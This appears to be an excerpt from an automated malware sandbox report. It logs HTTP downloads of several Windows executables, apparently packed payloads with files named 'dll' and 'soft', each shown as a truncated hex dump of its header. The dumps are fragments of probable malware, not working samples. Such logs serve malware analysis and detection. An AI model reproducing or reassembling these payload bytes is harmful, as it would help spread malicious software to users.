00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 23:43:35 GMTContent-Type: application/octet-streamContent-Length: 1806848Last-Modified: Mon, 09 Dec 2024 23:15:53 GMTConnection: keep-aliveETag: "67577a29-1b9200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 50 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 69 00 00 04 00 00 6b 09 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 2a 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6d 65 70 71 65 69 62 00 f0 19 00 00 50 4f 00 00 ec 19 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 78 77 70 78 66 6d 6c 00 10 00 00 00 40 69 00 00 06 00 00 00 6a 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 69 00 00 22 00 00 00 70 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 23:43:44 GMTContent-Type: application/octet-streamContent-Length: 971264Last-Modified: Mon, 09 Dec 2024 23:14:03 GMTConnection: keep-aliveETag: "675779bb-ed200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b3 79 57 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 22 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 bf a5 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 88 67 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 67 01 00 00 40 0d 00 00 68 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 5c 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 23:43:51 GMTContent-Type: application/octet-streamContent-Length: 2841600Last-Modified: Mon, 09 Dec 2024 23:14:28 GMTConnection: keep-aliveETag: "675779d4-2b5c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 31 d1 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 6d 65 79 69 75 68 74 00 00 2b 00 00 a0 00 00 00 fa 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 6b 63 64 6f 74 78 6d 00 20 00 00 00 a0 2b 00 00 06 00 00 00 34 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 2b 00 00 22 00 00 00 3a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 23:43:57 GMTContent-Type: application/octet-streamContent-Length: 2841600Last-Modified: Mon, 09 Dec 2024 23:14:30 GMTConnection: keep-aliveETag: "675779d6-2b5c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 31 d1 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 6d 65 79 69 75 68 74 00 00 2b 00 00 a0 00 00 00 fa 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 6b 63 64 6f 74 78 6d 00 20 00 00 00 a0 2b 00 00 06 00 00 00 34 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 2b 00 00 22 00 00 00 3a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 23:44:19 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 23:44:21 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 23:44:22 GMTContent-Type: application/octet-streamContent-Length: 2841600Last-Modified: Mon, 09 Dec 2024 23:14:30 GMTConnection: keep-aliveETag: "675779d6-2b5c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 31 d1 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 6d 65 79 69 75 68 74 00 00 2b 00 00 a0 00 00 00 fa 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 6b 63 64 6f 74 78 6d 00 20 00 00 00 a0 2b 00 00 06 00 00 00 34 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 2b 00 00 22 00 00 00 3a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 